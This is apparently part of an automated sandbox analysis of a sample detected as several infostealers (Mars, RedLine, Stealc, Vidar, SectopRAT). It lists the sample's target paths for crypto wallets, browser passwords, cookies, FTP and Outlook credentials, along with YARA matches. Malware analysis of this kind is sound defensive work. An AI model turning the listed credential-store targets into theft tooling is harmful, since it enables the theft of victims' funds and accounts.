Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 14.2.cmd.exe.5d800c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5d800c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.60b00c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.60b00c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.MSBuild.exe.1370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2968147762.0000000001427000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u3bs.0.exe PID: 6808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 896, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\osssciedmed, type: DROPPED

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 1.3.u3bs.0.exe.42d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u3bs.0.exe.42d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.42a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 14.2.cmd.exe.5d800c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5d800c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.60b00c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.60b00c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2972244441.0000000005D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2595395304.00000000060B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\osssciedmed, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 6164, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u3bs.0.exe PID: 6808, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 1.3.u3bs.0.exe.42d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.42a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.u3bs.0.exe.42d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.u3bs.0.exe.42a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2974851008.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1729816258.00000000042D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u3bs.0.exe PID: 6808, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C7A0C40 sqlite3_bind_zeroblob,	1_2_6C7A0C40
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C7A0D60 sqlite3_bind_parameter_name,	1_2_6C7A0D60
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6C8EA0 sqlite3_clear_bindings,	1_2_6C6C8EA0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C7A0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	1_2_6C7A0B40
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6C6410 bind,WSAGetLastError,	1_2_6C6C6410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
